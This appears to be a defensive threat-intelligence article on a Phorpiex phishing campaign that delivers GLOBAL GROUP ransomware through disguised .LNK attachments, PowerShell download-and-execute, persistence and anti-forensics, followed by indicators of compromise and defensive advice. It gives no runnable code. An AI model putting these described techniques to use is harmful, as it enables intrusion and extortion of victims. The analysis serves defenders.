Phishing remains one of the most effective initial access vectors in modern intrusion campaigns, and a recently disclosed campaign demonstrates how decades-old malware infrastructure — the Phorpiex botnet — continues to be leveraged for sophisticated ransomware delivery using deceptively simple file formats. Researchers from Forcepoint X-Labs recently unpacked this attack chain, which combines social engineering, “Living off the Land” (LotL) techniques, and an offline-capable ransomware payload dubbed GLOBAL GROUP.
1. Phorpiex: Persistent Malware-as-a-Service Platform
Phorpiex — also known as Trik — is a highly modular botnet first observed in 2010. It acts as a malware-as-a-service (MaaS) distribution platform, historically used for spamming, malware delivery, cryptomining, and extortion. Its modular design allows it to deliver arbitrary secondary payloads, including ransomware.
In this campaign, Phorpiex is the delivery mechanism: phishing emails carrying a seemingly innocuous attachment trigger a download and execution chain that results in ransomware deployment.
2. Attack Overview: Weaponised .LNK Files
2.1 Phishing Email and Social Engineering
The malicious campaigns use simple subject lines such as “Your Document” to lure recipients into opening an attachment. The attachment is not a Word document but a Windows Shortcut (.LNK) file with a double extension (e.g., Document.doc.lnk). Because Windows hides known extensions by default, the file appears to be a benign .doc to the victim.
The attackers also extract icons from legitimate Windows system libraries such as shell32.dll to visually mimic familiar document icons, further reinforcing the deception.
2.2 Execution Flow
Upon user interaction, the shortcut’s malicious payload executes silently in the background. The execution path is multi-stage, designed to evade static signature detection and leverages built-in Windows utilities:
- Shortcut Execution – Clicking the
.lnkrunscmd.exewith embedded arguments. - PowerShell Invocation – The command interpreter invokes PowerShell to download a secondary payload over HTTP/HTTPS.
- Payload Drop and Execution – The downloaded executable (often named to resemble a system component, e.g.,
C:\Windows\windrv.exe) is written to disk and then executed using PowerShell’sStart-Process. - Ransomware Activation – Execution passes control to the ransomware, which begins its encryption routine on the victim host.
This chain is silent by design: no obvious installers run, no user interface is displayed, and the malware invokes trusted processes (cmd.exe, PowerShell) to bypass many security controls.
3. GLOBAL GROUP Ransomware: Offline, Mute, and Self-Contained
Unlike many modern ransomware families, GLOBAL GROUP ransomware is designed to operate fully offline. Rather than contacting a command-and-control (C2) server to retrieve encryption keys or instructions, it generates everything locally on the compromised system.
This design works under several constraints:
- Offline execution: The ransomware does not require an active external connection — enabling execution in segmented or air-gapped environments.
- Local key generation: Encryption keys are produced on the host, removing the need to interact with remote infrastructure.
- No exfiltration: Despite ransom notes claiming otherwise, GLOBAL GROUP does not perform data exfiltration as part of its core routine.
This “mute” behaviour reduces characteristic network traffic that defenders commonly monitor to detect ransomware operations, making host-level indicators critical for detection.
4. Deep Technical Behaviour and Forensic Signals
Forcepoint’s analysis reveals several notable embedded behaviours and defensive telemetry markers within the GLOBAL GROUP ransomware binary:
4.1 Execution Cleanup and Anti-Forensics
- The ransomware uses a built-in timer mechanism (e.g., multiple ICMP echo requests to loopback addresses) to delay termination and allow execution before self-deletion of the main binary.
- After execution, the ransomware removes its original binary from disk, hindering forensic reconstruction.
4.2 Process Enumeration and Anti-Analysis
The ransomware includes anti-virtualisation and anti-analysis functionality. It enumerates running processes and exits silently if it detects sandbox environments or common analysis tools, thwarting automated detection ecosystems.
4.3 Persistence and Lateral Movement
- Post-encryption, the malware copies itself to
%windir%\Temp\cleanup.exeand creates a Windows service to maintain persistence. - A scheduled task (“CoolTask”) is created and triggered immediately, then removed to minimize footprint while retaining persistence.
- Advanced capabilities include LDAP queries to enumerate Active Directory objects, enabling potential propagation across domain networks.
4.4 File Processing and Ransom Note
- Files are encrypted using the ChaCha20-Poly1305 authenticated encryption algorithm, which provides authenticated encryption with associated data (AEAD) — eliminating tampering and requiring the unique private key to decrypt.
- Encrypted files are appended with the
.Recoextension, and a ransom note (README.Reco.txt) is deployed.
5. Indicators of Compromise (IOCs)
From Forcepoint’s report, defenders can track several key IOCs tied to this campaign:
- LNK Attachment Hash: Document.zip.lnk (
70a4afab44d6a9ecd7f42ab77972be074dec8383a47a2011eb0133a230a4fae3) - Payload URLs:
- Mutex Identifier:
Global\Fxo16jmdgujs437 - Encrypted File Extension:
.Reco - File Marker:
xcrydtednotstill_amazingg_time!!
These IOCs are essential for endpoint detection and response (EDR) tools and forensic analysis.
6. Defensive Recommendations
Given the sophistication of execution via trusted processes and offline ransomware deployment, defenders should consider:
- Attachment filtering that blocks or quarantines suspicious or unconventional file types (e.g.,
.lnk) regardless of extensions. - Behavioural monitoring for anomalous PowerShell,
cmd.exe, or downloader activity spawning from non-standard paths. - Host-based indicators such as unusual mutex activity, unexpected service creation, and file system artifacts (e.g.,
.Recoextensions). - User education focusing on extension visibility and social engineering cues that exploit UI symmetry to deceive recipients.
Conclusion
This incident underscores how legacy malware infrastructure like Phorpiex still fuels cutting-edge ransomware threats by combining old-school social engineering with modern defensive evasion strategies. The offline, self-contained nature of GLOBAL GROUP ransomware highlights the need for endpoint and host-centric telemetry, not merely network monitoring, to detect and disrupt such campaigns.
